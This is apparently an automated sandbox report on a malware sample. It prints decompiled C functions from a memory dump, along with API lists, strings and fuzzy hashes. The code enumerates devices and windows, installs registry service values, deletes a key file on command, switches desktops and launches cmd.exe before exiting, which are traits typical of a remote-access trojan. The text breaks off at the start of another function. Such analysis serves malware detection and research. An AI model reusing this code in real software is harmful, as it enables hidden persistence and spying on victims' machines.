				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HINSTANCE__* _t65;
				intOrPtr* _t79;

				_t65 = LoadLibraryA("Ole32.dll");
				_v20 = GetProcAddress(_t65, "CoInitialize");
				_v40 = GetProcAddress(_t65, "CoUninitialize");
				_v28 = GetProcAddress(_t65, "CoCreateInstance");
				_t40 = LoadLibraryA("Oleaut32.dll");
				_v24 = _t40;
				_t79 = GetProcAddress(_t40, "SysFreeString");
				_v20(0);
				_v16 = 0;
				_push( &_v32);
				_push(0x1001ff98);
				_push(1);
				_push(0);
				_push(0x1001ffd8);
				if(_v28() != 0) {
					L2:
					return 0;
				}
				_t46 = _v32;
				_push(0);
				_push( &_v8);
				_push(0x1001ffc8);
				_push(_t46);
				if( *((intOrPtr*)( *_t46 + 0xc))() == 0) {
					_t48 = _v8;
					 *((intOrPtr*)( *_t48 + 0x14))(_t48);
					while(1) {
						_t50 = _v8;
						_push( &_v36);
						_push( &_v12);
						_push(1);
						_push(_t50);
						if( *((intOrPtr*)( *_t50 + 0xc))() != 0) {
							break;
						}
						_t56 = _v12;
						_push( &_v20);
						_push(0x1001d278);
						_push(0);
						_push(0);
						_push(_t56);
						if( *((intOrPtr*)( *_t56 + 0x24))() >= 0) {
							_t60 = _v20;
							_push(0);
							_v56 = 8;
							_push( &_v56);
							_push(L"FriendlyName");
							_push(_t60);
							if( *((intOrPtr*)( *_t60 + 0xc))() == 0) {
								_v16 = _v16 + 1;
								 *_t79(_v48);
							}
							_t62 = _v20;
							 *((intOrPtr*)( *_t62 + 8))(_t62);
						}
						_t58 = _v12;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
					_v40();
					if(_t65 != 0) {
						FreeLibrary(_t65);
					}
					if(_v24 != 0) {
						FreeLibrary(_v24);
					}
					return _v16;
				}
				goto L2;
			}

0x10008de5
0x10008df5
0x10008e00
0x10008e0a
0x10008e0d
0x10008e15
0x10008e1c
0x10008e1f
0x10008e25
0x10008e28
0x10008e29
0x10008e2e
0x10008e30
0x10008e31
0x10008e3b
0x10008e54
0x00000000
0x10008e54
0x10008e3d
0x10008e43
0x10008e44
0x10008e47
0x10008e4c
0x10008e52
0x10008e5b
0x10008e61
0x10008e64
0x10008e64
0x10008e6a
0x10008e70
0x10008e71
0x10008e73
0x10008e79
0x00000000
0x00000000
0x10008e7b
0x10008e81
0x10008e82
0x10008e89
0x10008e8a
0x10008e8b
0x10008e91
0x10008e93
0x10008e99
0x10008e9a
0x10008ea2
0x10008ea3
0x10008ea8
0x10008eae
0x10008eb3
0x10008eb6
0x10008eb6
0x10008eb8
0x10008ebe
0x10008ebe
0x10008ec1
0x10008ec7
0x10008ec7
0x10008ecc
0x10008ed7
0x10008eda
0x10008eda
0x10008edf
0x10008ee4
0x10008ee4
0x00000000
0x10008ee6
0x00000000

APIs

LoadLibraryA.KERNEL32(Ole32.dll,000003F0,?,00000000), ref: 10008DDD
GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 10008DED
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10008DF8
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 10008E03
LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,1000B108), ref: 10008E0D
GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10008E18
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,1000B108), ref: 10008EDA
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000B108), ref: 10008EE4

Strings

Oleaut32.dll, xrefs: 10008E05
Ole32.dll, xrefs: 10008DD8
CoCreateInstance, xrefs: 10008DFA
CoInitialize, xrefs: 10008DE7
SysFreeString, xrefs: 10008E0F
FriendlyName, xrefs: 10008EA3
CoUninitialize, xrefs: 10008DEF

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
API String ID: 2256533930-3340630095
Opcode ID: 1d5636fc939de58d9792147b8814da67f2312df4f8546f53eb6070587ca61e80
Instruction ID: c8611f27dfd86f6c21d0aef3cf25d0136cbab2cc75bb21de3686322a7f56046f
Opcode Fuzzy Hash: 1d5636fc939de58d9792147b8814da67f2312df4f8546f53eb6070587ca61e80
Instruction Fuzzy Hash: 80410B70901219AFDB40EBE9CC88DAFBBB9FF84794B114459F505E7250DB719A02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000761F, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 117
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E1000761F(void* __eflags) {
				char _t38;
				intOrPtr _t39;
				void* _t43;
				void* _t48;
				void* _t49;
				void* _t59;
				signed int _t65;
				void* _t91;
				void* _t93;
				intOrPtr _t95;

				E100158AC(E1001A447, _t91);
				_t38 = "cmd.exe"; // 0x2e646d63
				 *(_t91 - 0x64) = _t38;
				_t39 =  *0x1002461c; // 0x657865
				 *((intOrPtr*)(_t91 - 0x60)) = _t39;
				_t65 = 0xa;
				memset(_t91 - 0x5c, 0, _t65 << 2);
				_t95 = _t93 - 0x15c + 0xc;
				asm("stosw");
				while(1) {
					_t43 = E10004A35(_t91 - 0x64);
					_pop(_t67);
					if(_t43 == 0) {
						break;
					}
					 *((intOrPtr*)(_t91 - 0x30)) = _t95;
					_push(_t91 - 0x64);
					L10015818();
					E1000490A();
				}
				GetModuleFileNameA(0, _t91 - 0x168, 0x104);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_push(0x10024634);
				asm("movsb");
				L10015818();
				 *(_t91 - 4) = 0;
				_push(_t91 - 0x168);
				_push(_t91 - 0x10);
				_t48 = _t91 - 0x18;
				_push(_t48);
				L10015830();
				 *(_t91 - 4) = 1;
				_push(_t91 - 0x10);
				_push(_t48);
				_t49 = _t91 - 0x14;
				_push(_t49);
				L1001582A();
				_push(_t49);
				 *(_t91 - 4) = 2;
				L10015824();
				 *(_t91 - 4) = 1;
				L1001580C();
				 *(_t91 - 4) = 0;
				L1001580C();
				E10001E15(_t91 - 0x2c, strlen(_t91 - 0x2c), 0x92);
				strcat(_t91 - 0x2c, E1000865D(_t91 - 0x10));
				_t59 = ShellExecuteA(0, 0, _t91 - 0x64, _t91 - 0x2c, 0, 0);
				if((0 | _t59 == 0x00000000) <= 0x20) {
					ExitProcess(0);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t59;
			}

0x10007624
0x1000762f
0x10007636
0x10007639
0x10007641
0x10007644
0x1000764a
0x1000764a
0x1000764c
0x1000764e
0x10007652
0x10007659
0x1000765a
0x00000000
0x00000000
0x10007662
0x10007665
0x10007666
0x1000766b
0x10007670
0x10007682
0x10007690
0x10007691
0x10007692
0x10007693
0x10007694
0x10007696
0x1000769e
0x1000769f
0x100076aa
0x100076ad
0x100076b1
0x100076b2
0x100076b5
0x100076b6
0x100076be
0x100076c2
0x100076c3
0x100076c4
0x100076c7
0x100076c8
0x100076cd
0x100076d1
0x100076d5
0x100076dd
0x100076e1
0x100076e9
0x100076ec
0x10007706
0x1000771b
0x1000772e
0x1000773e
0x10007741
0x10007741
0x10007747
0x1000774e
0x10007758
0x10007761

APIs

__EH_prolog.LIBCMT ref: 10007624

Part of subcall function 10004A35: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004A43
Part of subcall function 10004A35: Process32First.KERNEL32(00000000,?), ref: 10004A61
Part of subcall function 10004A35: strcmp.MSVCRT ref: 10004A74
Part of subcall function 10004A35: Process32Next.KERNEL32 ref: 10004A87

#537.MFC42(?,?,00000000,?,?), ref: 10007666

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,?), ref: 10007682
#537.MFC42(10024634,?,?), ref: 1000769F
#924.MFC42(?,?,?,10024634,?,?), ref: 100076B6
#922.MFC42(?,00000000,?,?,?,?,10024634,?,?), ref: 100076C8
#858.MFC42(00000000,?,00000000,?,?,?,?,10024634,?,?), ref: 100076D5
#800.MFC42(00000000,?,00000000,?,?,?,?,10024634,?,?), ref: 100076E1
#800.MFC42(00000000,?,00000000,?,?,?,?,10024634,?,?), ref: 100076EC
strlen.MSVCRT ref: 100076FA
strcat.MSVCRT(?,00000000), ref: 1000771B
ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 1000772E
ExitProcess.KERNEL32 ref: 10007741
#800.MFC42 ref: 1000774E

Strings

cmd.exe, xrefs: 1000762F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #800$Process32$#537CreateFirstH_prologSnapshotToolhelp32$#858#922#924ExecuteExitFileModuleNameNextProcessShellstrcatstrcmpstrlen
String ID: cmd.exe
API String ID: 237695861-723907552
Opcode ID: 9f364bee0b91fc4f96c0469f1a3013aa8f86d6413cc9dbec428b89e1757c9069
Instruction ID: 71673fc1df0d8936f07095ea775e0890056a3ddff162b35993799d4ca38fd40e
Opcode Fuzzy Hash: 9f364bee0b91fc4f96c0469f1a3013aa8f86d6413cc9dbec428b89e1757c9069
Instruction Fuzzy Hash: 78414EB6C00248EEEB05DBE4CC859EEB7BCFF09351F10451AF515AB181DF75AA48CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABC3, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000ABC3() {
				void _v244;
				char _v264;
				void _v523;
				char _v524;
				void _v783;
				char _v784;
				int _t33;
				int _t52;
				signed int _t61;
				void* _t84;
				void* _t90;
				void* _t91;
				void* _t95;

				_v524 = _v524 & 0x00000000;
				_t61 = 0x40;
				_push(5);
				memset( &_v523, 0, _t61 << 2);
				asm("stosw");
				asm("stosb");
				_push(0x3c);
				memcpy( &_v264, "CTXOPConntion_Class", 0 << 2);
				_v784 = _v784 & 0;
				_t33 = memset( &_v244, 0, 0 << 2);
				_push(0x40);
				memset( &_v783, _t33, 0 << 2);
				_t95 = _t91 + 0x30;
				asm("stosw");
				asm("stosb");
				_t84 = FindWindowA( &_v264, 0);
				while(_t84 != 0) {
					if(strcmp( &_v264, "CTXOPConntion_Class") == 0) {
						GetWindowTextA(_t84,  &_v264, 0x104);
						_t52 = strlen( &_v264);
						do {
							_t52 = _t52 - 1;
						} while ( *((char*)(_t90 + _t52 - 0x104)) != 0x5f);
						strcpy( &_v784, _t90 + _t52 - 0x103);
						strcat( &_v524,  &_v784);
						strcat( &_v524, " ");
						_t95 = _t95 + 0x18;
					}
					_t84 = GetWindow(_t84, 2);
					GetClassNameA(_t84,  &_v264, 0x104);
				}
				CloseHandle(_t84);
				E1000AB4C( &_v524);
				if(strlen( &_v524) <= 4) {
					return "NULL";
				}
				return  &_v524;
			}

0x1000abcc
0x1000abd7
0x1000abe0
0x1000abe2
0x1000abe4
0x1000abe6
0x1000abf3
0x1000abf5
0x1000abfa
0x1000ac06
0x1000ac08
0x1000ac11
0x1000ac11
0x1000ac13
0x1000ac15
0x1000ac25
0x1000ac29
0x1000ac4a
0x1000ac55
0x1000ac62
0x1000ac69
0x1000ac69
0x1000ac6a
0x1000ac83
0x1000ac96
0x1000aca7
0x1000acac
0x1000acac
0x1000acb8
0x1000acc3
0x1000acc9
0x1000acd2
0x1000acdf
0x1000acfe
0x00000000
0x1000ad00
0x1000ad06

APIs

FindWindowA.USER32 ref: 1000AC1F
strcmp.MSVCRT ref: 1000AC40
GetWindowTextA.USER32 ref: 1000AC55
strlen.MSVCRT ref: 1000AC62
strcpy.MSVCRT(?,?), ref: 1000AC83
strcat.MSVCRT(00000000,?,?,?), ref: 1000AC96
strcat.MSVCRT(00000000,10025028,00000000,?,?,?), ref: 1000ACA7
GetWindow.USER32(00000000,00000002), ref: 1000ACB2
GetClassNameA.USER32(00000000,?,00000104), ref: 1000ACC3
CloseHandle.KERNEL32(00000000), ref: 1000ACD2
strlen.MSVCRT ref: 1000ACEB

Strings

CTXOPConntion_Class, xrefs: 1000AC3A
CTXOPConntion_Class, xrefs: 1000ABE8
_, xrefs: 1000AC6A
NULL, xrefs: 1000AD00

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Window$strcatstrlen$ClassCloseFindHandleNameTextstrcmpstrcpy
String ID: CTXOPConntion_Class$CTXOPConntion_Class$NULL$_
API String ID: 2678433839-1570905837
Opcode ID: fd5324712115ed2843f719140aa6ccb466c4722588e95d581000a655d31fdaa4
Instruction ID: 33c7c46ff8f2f33d30e5b7b0074194beebe4ad81c6ed8f4a101d701c02f02402
Opcode Fuzzy Hash: fd5324712115ed2843f719140aa6ccb466c4722588e95d581000a655d31fdaa4
Instruction Fuzzy Hash: 3631A176800629ABEB10D764DC88FDA77BCEB08351F5001E6E648E6041EB74AB888F90

Uniqueness

Uniqueness Score: -1.00%

Function 10002C28, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 93
registrystringtimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10002C28() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SYSTEMTIME _v32;
				char _v64;
				char _v324;
				char* _t24;
				long _t26;
				int _t43;
				int _t48;

				wsprintfA( &_v324, "SYSTEM\\CurrentControlSet\\Services\\%s", "Vwxyab Defghijk");
				_t24 = RegOpenKeyExA(0x80000001,  &_v324, 0, 0x20019,  &_v8);
				_t48 = 0x50;
				_push(_t48);
				L10015806();
				_v16 = _t48;
				_t43 = 1;
				_v12 = _t43;
				_t26 = RegQueryValueExA(_v8, "Group", 0,  &_v12, _t24,  &_v16);
				if(_t26 != 0) {
					E1000D502(0x80000001,  &_v324, "Group", _t43, 0x10027154, strlen(0x10027154), 0);
					GetLocalTime( &_v32);
					wsprintfA( &_v64, "%4d-%.2d-%.2d %.2d:%.2d", _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff);
					return E1000D502(0x80000001,  &_v324, "InstallTime", _t43,  &_v64, strlen( &_v64), _t43);
				}
				return _t26;
			}

0x10002c45
0x10002c66
0x10002c6e
0x10002c6f
0x10002c70
0x10002c76
0x10002c7e
0x10002c84
0x10002c92
0x10002c9a
0x10002cbf
0x10002ccb
0x10002cf3
0x00000000
0x10002d20
0x10002d27

APIs

wsprintfA.USER32 ref: 10002C45
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,10002D99), ref: 10002C66
#823.MFC42(00000050), ref: 10002C70
RegQueryValueExA.ADVAPI32(10002D99,Group,00000000,?,00000000,?), ref: 10002C92
strlen.MSVCRT ref: 10002CA8

Part of subcall function 1000D502: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000001,000F01FF,00000000,?,10015A2A,1001B498,000000FF,?,10003278,80000002,?,Description,00000001,?,00000000), ref: 1000D52F
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000D546
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000D551
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000D55C
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000D567
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000D572
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000D57D
Part of subcall function 1000D502: FreeLibrary.KERNEL32(00000000,?,10003278,80000002,?,Description,00000001,?), ref: 1000D671

GetLocalTime.KERNEL32(?), ref: 10002CCB
wsprintfA.USER32 ref: 10002CF3
strlen.MSVCRT ref: 10002D01

Strings

Fatal, xrefs: 10002CA0, 10002CA7, 10002CB0
%4d-%.2d-%.2d %.2d:%.2d, xrefs: 10002CED
Group, xrefs: 10002CB8
SYSTEM\CurrentControlSet\Services\%s, xrefs: 10002C3F
Group, xrefs: 10002C8A
InstallTime, xrefs: 10002D14
Vwxyab Defghijk, xrefs: 10002C34

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$Librarystrlenwsprintf$#823FreeLoadLocalOpenQueryTimeValue
String ID: %4d-%.2d-%.2d %.2d:%.2d$Fatal$Group$Group$InstallTime$SYSTEM\CurrentControlSet\Services\%s$Vwxyab Defghijk
API String ID: 548350534-2616979974
Opcode ID: d1b791a346c1703b97ea2b50063ab2f146e890465352bfabdc464742a4d8b737
Instruction ID: 44714e98a0821778f504ed209df3c83011958f193c28db2cca10f28a8106401a
Opcode Fuzzy Hash: d1b791a346c1703b97ea2b50063ab2f146e890465352bfabdc464742a4d8b737
Instruction Fuzzy Hash: FA212BB2900118BAEB11DB95EC89FFFB77CEB08711F504056FA05E1090EB78AB459B75

Uniqueness

Uniqueness Score: -1.00%

Function 10008C6F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 83
stringsleepfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10008C6F(intOrPtr __ecx) {
				int _t21;
				char* _t51;
				void* _t53;
				void* _t55;

				_t21 = E100158AC(E1001A48E, _t53);
				_t51 =  *((intOrPtr*)(_t53 + 8));
				 *((intOrPtr*)(_t53 - 0x10)) = _t55 - 0x10c;
				 *((intOrPtr*)(_t53 - 0x14)) = __ecx;
				if( *_t51 == 2) {
					_t21 = E10008B51(__ecx);
				}
				if( *_t51 == 0x64) {
					_t21 = E1000BF29( *((intOrPtr*)(_t53 - 0x14)));
				}
				if( *_t51 == 3) {
					 *(_t53 - 4) = 0;
					 *0x100273bc(0, _t53 - 0x118, 0x1c, 0);
					if(PathFileExistsA(_t53 - 0x118) == 0) {
						PathStripToRootA(_t53 - 0x118);
						strcat(_t53 - 0x118, "Windows\\");
						strcat(_t53 - 0x118, "Fatal");
						_push(".key");
					} else {
						strcat(_t53 - 0x118, "\\");
						strcat(_t53 - 0x118, "Fatal");
						_push(".key");
					}
					strcat(_t53 - 0x118, ??);
					_t21 = DeleteFileA(_t53 - 0x118);
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
				}
				if( *_t51 == 6) {
					 *0x10024984 = 1;
				}
				if( *_t51 == 7) {
					 *0x10024984 =  *0x10024984 & 0x00000000;
				}
				if( *0x10024984 != 0) {
					Sleep(0x4d2);
					E10008AED( *((intOrPtr*)(_t53 - 0x14)));
					_t21 = E10008B51( *((intOrPtr*)(_t53 - 0x14)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t21;
			}

0x10008c74
0x10008c81
0x10008c85
0x10008c88
0x10008c8e
0x10008c90
0x10008c90
0x10008c98
0x10008c9d
0x10008c9d
0x10008ca5
0x10008cb8
0x10008cbb
0x10008cd0
0x10008d02
0x10008d14
0x10008d25
0x10008d2a
0x10008cd2
0x10008cde
0x10008cef
0x10008cf4
0x10008cf4
0x10008d36
0x10008d45
0x10008d56
0x10008d56
0x10008d5d
0x10008d5f
0x10008d5f
0x10008d6c
0x10008d6e
0x10008d6e
0x10008d7c
0x10008d83
0x10008d8c
0x10008d94
0x10008d94
0x10008d9e
0x10008da7

APIs

__EH_prolog.LIBCMT ref: 10008C74
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10008CBB
PathFileExistsA.SHLWAPI(?), ref: 10008CC8
strcat.MSVCRT(?,100249A8), ref: 10008CDE
strcat.MSVCRT(?,Fatal,?,100249A8), ref: 10008CEF
PathStripToRootA.SHLWAPI(?), ref: 10008D02
strcat.MSVCRT(?,Windows\), ref: 10008D14
strcat.MSVCRT(?,Fatal,?,Windows\), ref: 10008D25
strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 10008D36
DeleteFileA.KERNEL32(?), ref: 10008D45
Sleep.KERNEL32(000004D2), ref: 10008D83

Part of subcall function 10008B51: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10008B71
Part of subcall function 10008B51: PathFileExistsA.SHLWAPI(?), ref: 10008B7E
Part of subcall function 10008B51: strcat.MSVCRT(?,10024988), ref: 10008B94
Part of subcall function 10008B51: strcat.MSVCRT(?,Fatal,?,10024988), ref: 10008BA5
Part of subcall function 10008B51: strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 10008BEC
Part of subcall function 10008B51: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10008C0B
Part of subcall function 10008B51: GetFileSize.KERNEL32(00000000,00000000), ref: 10008C1C
Part of subcall function 10008B51: #823.MFC42(00000000), ref: 10008C25
Part of subcall function 10008B51: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10008C37
Part of subcall function 10008B51: #825.MFC42(00000000), ref: 10008C59
Part of subcall function 10008B51: CloseHandle.KERNEL32(?), ref: 10008C63

Strings

Fatal, xrefs: 10008CE9, 10008D1F
.key, xrefs: 10008CF4
Windows\, xrefs: 10008D0E
.key, xrefs: 10008D2A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strcat$File$Path$ExistsFolderSpecial$#823#825CloseCreateDeleteH_prologHandleReadRootSizeSleepStrip
String ID: .key$.key$Fatal$Windows\
API String ID: 2909487257-763963170
Opcode ID: 8e64a781db34a015fb1c60a423adeb75ce86f4d29a31400006eddf40812304c6
Instruction ID: 9aaaad1e7bcce722f2183407ee5c3562c55df388ba15578be8663182e4c05dd7
Opcode Fuzzy Hash: 8e64a781db34a015fb1c60a423adeb75ce86f4d29a31400006eddf40812304c6
Instruction Fuzzy Hash: 0331E271C00259AAFB20DBA4CC86BDEBBBCFF41340F50459AE284A6081DB749BC58B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD54, Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 75
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E1000CD54(char _a4) {
				signed int _v8;
				intOrPtr _v20;
				_Unknown_base(*)()* _v36;
				signed int _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				char _v56;
				_Unknown_base(*)()* _v60;
				_Unknown_base(*)()* _v64;
				char _v320;
				_Unknown_base(*)()* _v324;
				void* __ebx;
				void* __ebp;
				struct HINSTANCE__* _t28;
				void* _t39;
				struct HINSTANCE__* _t40;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr _t51;

				 *[fs:0x0] = _t51;
				_t40 = LoadLibraryA("user32.dll");
				_v48 = _t40;
				_v64 = GetProcAddress(_t40, "GetThreadDesktop");
				_v36 = GetProcAddress(_t40, "GetUserObjectInformationA");
				_v324 = GetProcAddress(_t40, "SetThreadDesktop");
				_v60 = GetProcAddress(_t40, "CloseDesktop");
				_t28 = LoadLibraryA("kernel32.dll");
				_v52 = _t28;
				_t49 = _v64( *(GetProcAddress(_t28, "GetCurrentThreadId"))(), _t43, _t47, _t39,  *[fs:0x0], 0x10015a2a, 0x1001b468, 0xffffffff);
				_v44 = 1;
				_v8 = 0;
				_push( &_v56);
				_push(0x100);
				_push( &_v320);
				_push(2);
				_t12 =  &_a4; // 0x74
				_push( *_t12);
				if(_v36() == 0) {
					L2:
					_v44 = 0;
				} else {
					_push(_a4);
					if(_v324() != 0) {
						_v60(_t49);
					} else {
						goto L2;
					}
				}
				_v8 = _v8 | 0xffffffff;
				E1000CE37(_t40);
				 *[fs:0x0] = _v20;
				return _v44;
			}

0x1000cd6a
0x1000cd87
0x1000cd89
0x1000cd9a
0x1000cda5
0x1000cdb0
0x1000cdbe
0x1000cdc6
0x1000cdc8
0x1000cdd9
0x1000cddb
0x1000cde4
0x1000cdea
0x1000cdeb
0x1000cdf6
0x1000cdf7
0x1000cdf9
0x1000cdf9
0x1000ce01
0x1000ce10
0x1000ce10
0x1000ce03
0x1000ce03
0x1000ce0e
0x1000ce16
0x00000000
0x00000000
0x00000000
0x1000ce0e
0x1000ce19
0x1000ce1d
0x1000ce28
0x1000ce33

APIs

LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000CD85
GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 1000CD98
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 1000CDA3
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 1000CDAE
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000CDBC
LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000CDC6
GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 1000CDD1

Strings

SetThreadDesktop, xrefs: 1000CDA8
GetCurrentThreadId, xrefs: 1000CDCB
CloseDesktop, xrefs: 1000CDB6
kernel32.dll, xrefs: 1000CDC1
tDesktop, xrefs: 1000CDF9
GetUserObjectInformationA, xrefs: 1000CD9D
user32.dll, xrefs: 1000CD7A
GetThreadDesktop, xrefs: 1000CD8C

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$tDesktop$user32.dll
API String ID: 2238633743-1569342589
Opcode ID: 7718944927d66ab4099d46665a0b7f960bc9bf0d0ca60dd05cb4132abac541fb
Instruction ID: 798c644e18316da013a04b984731728ae8a07a1986d1600ab7f016e136b6c341
Opcode Fuzzy Hash: 7718944927d66ab4099d46665a0b7f960bc9bf0d0ca60dd05cb4132abac541fb
Instruction Fuzzy Hash: 902107B1D00658BBEB10DFA9DC44EEDBBB8EF48361F504126F915F2290DBB599408F64

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB12, Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041FB12(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
